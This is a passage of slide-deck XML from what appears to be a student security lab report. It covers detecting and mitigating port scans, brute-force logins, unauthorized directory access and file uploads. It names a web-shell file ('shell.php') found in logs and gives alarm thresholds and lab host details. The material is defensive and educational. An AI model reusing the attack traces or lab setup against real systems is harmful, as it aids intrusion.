          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>96 requests were made to this directory</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The files requested were </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200"/>
              <a:t>Password.dav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1411625" y="865587"/>
            <a:ext cx="5124046" cy="2406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pic>
        <p:nvPicPr>
          <p:cNvPr id="1198" name="Google Shape;1198;p69"/>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99" name="Google Shape;1199;p69"/>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0" name="Google Shape;1200;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06" name="Google Shape;1206;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marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207" name="Google Shape;1207;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1604700"/>
            <a:ext cx="4298400" cy="32412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What kind of alarm can be set to detect future port scans?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="222222"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Normally, port scans trigger huge amounts of requests to different ports or IP Addresses within a short period of time. Such port scans can be easily detected by simple mechanisms like counting the number of requested ports for each Source IP Address</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="222222"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>An IPS Firewall can also be used to detect future port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>scanning</a:t>
            </a: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0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This is a complicated question, a short answer is it will depending on the IPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>capabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> of the firewall, a long answer can be read in the document at:</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="222222"/>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://tsapps.nist.gov/publication/get_pdf.cfm?pub_id=913287</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208" name="Google Shape;1208;p70"/>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configurations can be set on the host to mitigate port scans?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>A host based IPS firewall is the best solution against port scans.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>configurations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> as such as disable services and protocols not necessary would help lesser the vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>A simple firewall with only the necessary ports open can also help.</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14" name="Google Shape;1214;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5" name="Google Shape;1215;p71"/>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What kind of alarm can be set to detect future unauthorized access?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The alarms that can be set are:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>fail logins;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Geo Location access;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Time based access.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fail logins;</a:t>
            </a:r>
            <a:endParaRPr>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More than 5 attempts in less than a minute</a:t>
            </a:r>
            <a:endParaRPr sz="1200">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Geo Location access;</a:t>
            </a:r>
            <a:endParaRPr>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Access from locations aliens for the organization</a:t>
            </a:r>
            <a:endParaRPr sz="1200">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Time based access.</a:t>
            </a:r>
            <a:endParaRPr>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Access out of the business hours</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1216" name="Google Shape;1216;p7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unwanted access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Any access should follow least </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> principle.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Root access should be avoided.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Any access should be logged. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accounts with more than 5 consecutive login attempts should be locked</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">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22" name="Google Shape;1222;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3" name="Google Shape;1223;p7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brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Fail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> attempts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17500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fail logins;</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More than 5 attempts in less than a minute</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1224" name="Google Shape;1224;p7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brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Accounts with more than 5 consecutive login attempts should be locked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30" name="Google Shape;1230;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1" name="Google Shape;1231;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access to this directory?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Access to the directory should be monitored</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17500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Any access to the directory can trigger the alarm;</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Also consecutive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>failed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>attempts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> from any user accessing the directory should also trigger the directory alarm.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232" name="Google Shape;1232;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control access?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Any access should follow least privilege principle.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Root access should be avoided.</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Any access should be logged.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Accounts with more than 5 consecutive login attempts should be locked</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 host based IPS firewall against brute-force attacks.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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the required command line(s). </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="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38" name="Google Shape;1238;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9" name="Google Shape;1239;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file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>File upload should be monitored.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17500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Any upload can trigger the alarm.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1240" name="Google Shape;1240;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file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Disable file uploads in the Web Server Service configuration.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3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7069425" y="910475"/>
            <a:ext cx="1820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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Netmask:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Gateway: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Ubuntu 18.04.1 LTS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname: server1(Web)</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192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ubuntu 18.04.1 LTS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hostname:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS: kali 2020.1</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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OS: Windows 10</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
